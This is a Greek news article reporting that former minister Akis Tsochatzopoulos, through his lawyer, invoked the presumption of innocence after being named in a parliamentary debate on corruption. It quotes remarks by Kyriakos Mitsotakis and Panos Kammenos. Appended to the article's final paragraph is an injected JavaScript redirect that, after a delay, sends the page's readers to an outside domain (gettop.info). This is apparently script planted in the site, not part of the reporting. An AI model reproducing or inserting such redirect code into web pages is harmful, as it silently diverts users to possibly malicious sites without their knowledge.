Ο Άκης απαντά για «τα ορφανά του Τσοχατζόπουλου»

0
11

 

Την αντίδραση του Άκη Τσοχατζόπουλου προκάλεσε το γεγονός ότι το όνομά του αναφέρθηκε πολλές φορές κατά τη διάρκεια της προ ημερησίας διατάξεως συζήτηση στη Βουλή, για τη διαπλοκή και τη διαφθορά.

Μάλιστα, από το δικηγορικό γραφείο του συνηγόρου του, Γιάννη Παγορόπουλου, εκδόθηκε η ακόλουθη ανακοίνωση:

«…Ο κος Τσοχατζόπουλος, στο πρόσωπο του οποίου έγινε εκτενής αναφορά, χτες το βράδυ, κατά τη διάρκεια της προ ημερησίας διατάξεως συζήτηση των Αρχηγών των κομμάτων στη Βουλή, για τη διαπλοκή και τη διαφθορά, δικάζεται αυτή τη στιγμή από το Δικαστήριο Κακουργημάτων της Αθήνας, σε δεύτερο βαθμό.

Μέχρις ότου λοιπόν, εκδοθεί τελεσίδικη απόφαση, επί της κατηγορίας που τον βαραίνει, τεκμαίρεται ότι είναι αθώος, με βάση το Σύνταγμα, τους νόμους και τη Σύμβαση των Ανθρωπίνων Δικαιωμάτων. Κάθε άλλη συμπεριφορά υποβαθμίζει το ρόλο του Δικαστηρίου και είναι ασύμβατη με τους κανόνες δικαίου…».

Υπενθυμίζεται ότι χθες κατά την ομιλία του στη Βουλή ο Κυριάκος Μητσοτάκης ανέφερε : «...τα ορφανά του Τσοχατζόπουλου βρήκαν σε εσάς τον θετό τους πατέρα. Ο δικηγόρος του Κουτσόγιωργα βρήκε σε εσάς τον καινούργιο του εργοδότη. Κοσκωτάς – Τσίρπας, ένας Ματζουράνης δρόμος».

Επίσης, ο Πάνος Καμμένος χαρακτήρισε «δεξί χέρι του Τσοχατζόπουλου» τον Βασίλη Οικονόμου προκαλώντας την αντίδραση του βουλευτή της Νέας Δημοκρατίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here